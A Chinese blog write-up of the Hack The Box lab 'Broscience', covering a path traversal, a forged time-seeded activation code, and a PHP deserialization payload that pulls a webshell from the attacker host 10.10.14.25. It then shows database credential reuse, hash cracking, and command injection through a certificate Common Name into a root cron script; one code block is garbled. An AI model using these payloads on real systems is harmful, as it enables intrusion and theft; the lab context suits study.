靶场笔记-HTB Broscience

程序员菠萝

已于 2024-01-10 19:14:09 修改

阅读量53

点赞数

文章标签：笔记 android

于 2023-08-15 10:00:00 首次发布

本文链接：https://blog.csdn.net/xnxqwzy/article/details/132288209

版权

一、常规端口扫描

开放三个端口

二、web渗透

打开80端口是一个带有登录功能的健身网页
目录扫描一波，发现了几个目录列表，有源码泄露漏洞
点击img.php,有个错误提示，提示缺少path参数
那就拼接好参数，尝试能否读取到系统文件，直接写…/…/…/…/…/etc/passwd会被拦截，有参数过滤，但是通过两次url编码可以绕过
把读取到的passwd下载到本地，发现这台机器有三个用户，分别是root,bill和postgres
利用curl把includes目录的php文件全下载到本地，便于之后的分析需要
回到之前的网页，本来想着是自己注册一个账号登录，看看后台是否含有利用的点，但是注册完毕后还要点击验证链接，由于是靶场环境，只能自己尝试绕过
把注册页面的register.php下载下来分析一波源码

发现在注册用户的时候调用了utils.php并且发送激活链接调用了activate.php

再把activate.php下载下来分析，发现这个页面只能告诉我们验证码是个32位的字母和数字组合

在activate.php没得到更多有用的信息，但是之前分析register.php的时候发现还调用了utils.php，于是把之前下载的utils.php来拿出来分析一波，在阅读utils.php的时候，这个php文件的第一段代码就直接告诉我们了生成验证码的方法，利用注册时的系统时间来初始化随机数的种子值，从而生成一个32位字符的验证码，这里还有一个可以利用的点，后面会说到

那我们就可以直接用他这个源码生成一个验证码

php中time函数生成的值如下格式，可以找到注册时间再利用https://www.epochconverter.com/这个网站来生成

新建一个yzm.php文件,内容如下，之后利用php -f yzm.php来生成激活码

    <?php
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(1676033457);  // 这里的值由上面网站生成
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}
echo generate_activation_code() ;
?>

回到注册页面打开f12，把请求内容复制下来，利用curl来显示出cookie以及请求时间

curl -X POST -d 'username=asd&email=asd%40htb.com&password=asd&password-confirm=asd' https://broscience.htb/register.php -k -i

在利用curl拼接上cookie和上面生成的激活码来激活账号（这里图片跟上面不一致，是因为这个靶场会定期删除账号及上传内容）
```
curl -k -X POST -b 'PHPSESSID=q2aivm3nb6aid52je1c3c7kull' https://broscience.htb/activate.php?code=mokEoV8EyMTtc2ouUJfio6eXjyQPbNdL -i
```

利用激活的账号，登录到网站中，有个用户界面，在之前分析utils.php中发现这个php文件还负责生成用户cookie中的user-prefs，并且还具有一个可利用的反序列化漏洞。

在utils.php中avatar 类有两个参数，一个参数imgpath用于指向图像的路径，另一个tmp参数作用是保存img传来的内容。

在AvatarInterface中有一个__wakeup()魔法函数，用于创建 avatar 类的新实例和avatar类的类保存方法。

所以我们可以将
imgpath路径直接设置为我们反连shell的地址，tmp路径会将其保存在当前目录下，之后可以访问shell.php并且获得一个shell。

反序列化php内容如下，这里的shell.php，我用的是kali自带的，用其他的也一样道理

    <?php
class Avatar {
    public $imgPath;

    public function __construct($imgPath) {
        $this->imgPath = $imgPath;
    }

    public function save($tmp) {
        $f = fopen($this->imgPath, "w");
        fwrite($f, file_get_contents($tmp));
        fclose($f);
    }
}

class AvatarInterface {
    public $tmp="http://10.10.14.25:80/shell.php";
    public $imgPath="./shell.php"; 

    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
$payload = base64_encode(serialize(new AvatarInterface));
echo $payload;
?>

利用php -f payload.php运行输出，得到含有恶意代码的cookie，再把此cookie利用cookie
editor插件写入页面同时利用python临时生成一个web服务器，之后刷新网页

访问https://broscience.htb/shell.php成功得到一个shell，找到一个立足点

但是这个shell的权限太低，需要提权才能读取到flag

三、提权至用户

在之前的过程中发现这台机器有个postgres用户，并且在泄露的源码中发现了db_connect.php（如下）直接暴露了数据库连接的账号密码等信息，于是想到连接postgresql看看能不能找到一些有用的账号密码
```
<?php
```
$db_host = “localhost”;
$db_port = “5432”;
$db_name = “broscience”;
$db_user = “dbuser”;
$db_pass = “RangeOfMotion%777”;
$db_salt = “NaCl”;

$KaTeX parse error: Expected '}', got 'EOF' at end of input: \dotsconnect("host={$ db_host} port={ $KaTeX parse error: Expected 'EOF', got '}' at position 8: db_port}̲ dbname={$ db_name} user={ $KaTeX parse error: Expected 'EOF', got '}' at position 8: db_user}̲ password={$ db_pass}");

if (!$db_conn) {
die(“Error: Unable to connect to database”);
}

这里我发现他在反弹回来的shell用psql连接时会一直卡住，但是用python生成一个交互式shell之后就没啥问题了

    python3 -c "import pty;pty.spawn('/bin/bash')"

psql -h localhost -p 5432  -U dbuser -d broscience

进入shell之后利用\dt查看一下有哪些表，这里注意到有个users表，一般情况下账号密码应该保存在这个表下，利用\copy (SELECT * FROM
users) TO '/tmp/users.csv‘命令把users表转存在本地便于分析

查看users.csv,发现了几个用户名和密码，但是密码是加密的，由于这个机器涉及到的用户只有bill，那就利用hashcat直接针对bill的密码hash值进行破解，hashcat -m 20 bill.txt /usr/share/wordlists/rockyou.txt得到bill:iluvhorsesandgym

利用得到的账号密码进行ssh登录，成功获取user.txt的flag

四、提权至ROOT

拿到userflag之后又是一些常规的提权信息收集，在跑pspy脚本时发现有个计划任务再以root身份运行

切到/opt目录查看一下renew_cert.sh是做什么的，内容如下：

#!/bin/bash

if [ “$#” -ne 1 ] || [ $1 == “-h” ] || [ $1 == “–help” ] || [ $1 == “help” ]; then
echo “Usage: $0 certificate.crt”;
exit 0;
fi

if [ -f $1 ]; then

openssl x509 -in $1 -noout -checkend 86400 > /dev/null

if [ $? -eq 0 ]; then
    echo "No need to renew yet.";
    exit 1;
fi

subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-)

country=$(echo $subject | grep -Eo 'C = .{2}')
state=$(echo $subject | grep -Eo 'ST = .*,')
locality=$(echo $subject | grep -Eo 'L = .*,')
organization=$(echo $subject | grep -Eo 'O = .*,')
organizationUnit=$(echo $subject | grep -Eo 'OU = .*,')
commonName=$(echo $subject | grep -Eo 'CN = .*,?')
emailAddress=$(openssl x509 -in $1 -noout -email)

country=${country:4}
state=$(echo ${state:5} | awk -F, '{print $1}')
locality=$(echo ${locality:3} | awk -F, '{print $1}')
organization=$(echo ${organization:4} | awk -F, '{print $1}')
organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}')
commonName=$(echo ${commonName:5} | awk -F, '{print $1}')

echo $subject;
echo "";
echo "Country     => $country";
echo "State       => $state";
echo "Locality    => $locality";
echo "Org Name    => $organization";
echo "Org Unit    => $organizationUnit";
echo "Common Name => $commonName";
echo "Email       => $emailAddress";

echo -e "\nGenerating certificate...";
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
$state
$locality
$organization
$organizationUnit
$commonName
$emailAddress
" 2>/dev/null

/bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"

else
echo “File doesn’t exist”
exit 1;

通过分析发现renew_cert.sh脚本主要是用来检查SSL证书是否过期的，但是他的倒数第四行却有个可控变量$commonName，我们可以利用openssl生成一个新证书，在填写Common Name这一栏时加入恶意代码，让它以root权限运行，从而获得root权限
```
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -days 1 -keyout broscience.key -out broscience.crt 
```